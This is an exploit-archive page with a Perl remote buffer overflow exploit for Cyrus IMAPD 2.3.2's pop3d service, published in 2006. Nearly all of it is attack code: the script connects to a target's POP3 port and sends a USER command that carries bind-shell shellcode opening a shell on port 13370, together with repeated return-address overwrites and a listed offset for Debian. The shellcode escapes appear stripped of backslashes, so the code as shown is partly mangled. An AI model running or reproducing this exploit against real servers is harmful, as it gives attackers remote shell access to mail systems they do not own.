Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
# Published : 2006-08-14
# Author : K-sPecial
# Previous Title : WFTPD 3.23 (SIZE) Remote Buffer Overflow Exploit
# Next Title : MS Windows CanonicalizePathName() Remote Exploit (MS06-040)

#!/usr/bin/perl
## Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
## Name: bid-18056.pl
## Date: 08/12/2006
## 
## Description: this is yet another exploit for the cyrus pop3d buffer overflow. I tried both public
##  exploits and not either of them worked (not that they don't but coding my own is generaly faster
##  and easier) so I coded my own. The exploit by kcope seems to be done right and maybe i just got realy
##  unlucky and missed the offset in between the 5 runs i gave it. The one from bannedit was interesting...
##  realy nice idea about overwriting the pointer and sticking your shellcode in GOT. Only problem is that
##  when i was writing this exploit with the same method, and i placed my shellcode in GOT, functions before
##  the return from the vuln function where segfaulting first by trying to actualy *use* the GOT! So what I have
##  done here is used the same method, yet found a data area that is not going to freak pop3d
##  out before it gets to the return. Specificy I use part of the .data segment (or was it .bss, anyways) labeled
##  'buf'. With this the same one-offset-per-machine is gained that bannedit was achieving. 
##
## Other: Basicly what all this means, is you just have to give an offset that is a location in memory that
##  is writeable and executable (anything in .data, .bss, .stack, .heap, etc) and make sure it's not something
##  that will need to be used by functions in pop3d before popd_canon_user() returns and hence executes your
##  shellcode (because it'll segfault and won't get executed).
##
## Note: bindport is 13370
#################################################################################################################
use IO::Socket;
use strict;

my $host = $ARGV[0] || help();
my $offset = $ARGV[1] || help();
my $port = 110;

# stollen from cyruspop3d.c because this actualy worked, i couldn't get any
# metasploit sc to work (as usualy, hmph)
my $shellcode = 
"x31xdbx53x43x53x6ax02x6ax66x58x99x89xe1xcdx80x96".
"x43x52x66x68x34x3ax66x53x89xe1x6ax66x58x50x51x56".
"x89xe1xcdx80xb0x66xd1xe3xcdx80x52x52x56x43x89xe1".
"xb0x66xcdx80x93x6ax02x59xb0x3fxcdx80x49x79xf9xb0".
"x0bx52x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52x53".
"x89xe1xcdx80";

my $sock = IO::Socket::INET->new('PeerAddr' => $host,
                                 'PeerPort' => $port) or die ("-!> unable to connect to '$host:$port': $!n");

$sock->autoflush();

print $sock "USER ";                       ## begin USER command with just that
print $sock "$shellcode";                  ## shellcode is *userbuf is *user
print $sock pack('l', hex($offset)) x 120; ## location overwrites EIP and *out, userbuf/user written to *out
print $sock "n";                          ## that simple

sub help {
	print "bid-18056.pl by K-sPecial (xzziroz.net) of .aware (awarenetwork.org)n";
	print "08/12/2006nn";
	print "perl $0 $host $offsetnn";
	
	print "Offsets: n";
	print "0x8106c20 (debian 3.1 - 2.6.16-rc6)n";

	exit(0);
}

# www.Syue.com [2006-08-14]